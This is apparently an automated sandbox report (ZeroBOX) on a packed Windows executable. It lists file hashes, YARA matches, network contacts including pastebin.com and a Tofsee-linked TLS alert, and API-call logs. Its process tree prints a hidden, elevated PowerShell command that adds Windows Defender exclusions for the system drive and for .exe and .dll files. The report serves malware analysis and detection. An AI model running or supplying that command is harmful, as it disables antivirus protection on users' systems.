Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 31, 2023, 5:28 p.m.	July 31, 2023, 5:31 p.m.

Size	3.3MB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`2eb21acbab653f9007db89469ca991c9`
SHA256	`9ed0ffeb25bd64d20de3ae1a0134f535534e1bf66fba1a04a3b864b274ee5dc7`
CRC32	`3075877B`
ssdeep	`24576:74TY5HReB07yCo6OVtsdEFL/G3HciUfYgwJSUW99xNdkQ7+OT:8KHoayCqGuw3H+DPTxNdkYT`
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

zdkecjb7.exe "C:\Users\test22\AppData\Local\Temp\zdkecjb7.exe"
2084
powershell.exe powershell "Start-Process <#akygaezflrody#> powershell <#akygaezflrody#> -Verb <#akygaezflrody#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
2800
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
  2928
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
pastebin.com	A 172.67.34.170 A 104.20.67.143 A 104.20.68.143	104.20.68.143
ip-api.com	A 208.95.112.1	208.95.112.1
www.microsoft.com	CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net CNAME www.microsoft.com-c-3.edgekey.net CNAME e13678.dscb.akamaiedge.net A 104.76.29.199	23.210.41.137

IP Address	Status	Action
104.20.68.143	Active	Moloch
104.76.29.199	Active	Moloch
164.124.101.2	Active	Moloch
185.149.146.118	Active	Moloch
185.159.129.168	Active	Moloch
208.95.112.1	Active	Moloch
46.29.235.84	Active	Moloch
77.91.77.144	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49172 -> 104.20.68.143:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 104.76.29.199:80 -> 192.168.56.103:49165	2012692	ET POLICY Microsoft user-agent automated process response to automated request	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49172 104.20.68.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	c7:af:cc:81:4d:27:d1:4c:7c:f4:bf:5d:55:9d:80:50:3b:6f:6c:cd

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2023, 5:29 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 31, 2023, 5:28 p.m.			0	0
IsDebuggerPresent July 31, 2023, 5:29 p.m.			0	0
IsDebuggerPresent July 31, 2023, 5:29 p.m.			0	0

Command line console output was observed (10 events)

Time & API	Arguments	Status	Return
WriteConsoleA July 31, 2023, 5:28 p.m.	buffer: Alznxa81 console_handle: 0x00000007	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath $env:SystemDrive -ExclusionExtension .e console_handle: 0x00000053	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: xe, .dll -Force console_handle: 0x0000005f	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW July 31, 2023, 5:29 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501470 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500bf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00500d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005014f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005013f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005013f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5280 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2023, 5:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006f5b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 31, 2023, 5:29 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.teext
section	.But...

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 31, 2023, 5:28 p.m.	stacktrace: symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 exception.instruction_r: 8b 10 8b 45 08 01 d0 89 45 f0 8b 45 e8 8b 55 dc exception.symbol: symbol_enumerate_module+0x4c symbol-0xc9 exception.instruction: mov edx, dword ptr [eax] exception.module: monitor-x86.dll exception.exception_code: 0xc0000005 exception.offset: 49663 exception.address: 0x746ac1ff registers.esp: 38284744 registers.edi: 38285340 registers.eax: 622722902 registers.ebp: 38284816 registers.edx: 0 registers.ebx: 430 registers.esi: 2005598531 registers.ecx: 1361969152	1	0	0
__exception__ July 31, 2023, 5:28 p.m.	stacktrace: symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 symbol+0x72 misc_init-0x17e @ 0x746ac33a log_exception+0x47a log_action-0x1a3 @ 0x746a371c New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143 exception.instruction_r: 8b 10 8b 45 08 01 d0 89 45 f0 8b 45 e8 8b 55 dc exception.symbol: symbol_enumerate_module+0x4c symbol-0xc9 exception.instruction: mov edx, dword ptr [eax] exception.module: monitor-x86.dll exception.exception_code: 0xc0000005 exception.offset: 49663 exception.address: 0x746ac1ff registers.esp: 3156800 registers.edi: 3157396 registers.eax: 622722902 registers.ebp: 3156872 registers.edx: 0 registers.ebx: 430 registers.esi: 2005598531 registers.ecx: 1361969152	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 31, 2023, 5:28 p.m.

stacktrace:

symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
log_exception+0x47a log_action-0x1a3 @ 0x746a371c
New_ntdll_RtlDispatchException@8+0xd7 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x42 @ 0x746c480c
KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x778b0143
symbol+0x72 misc_init-0x17e @ 0x746ac33a
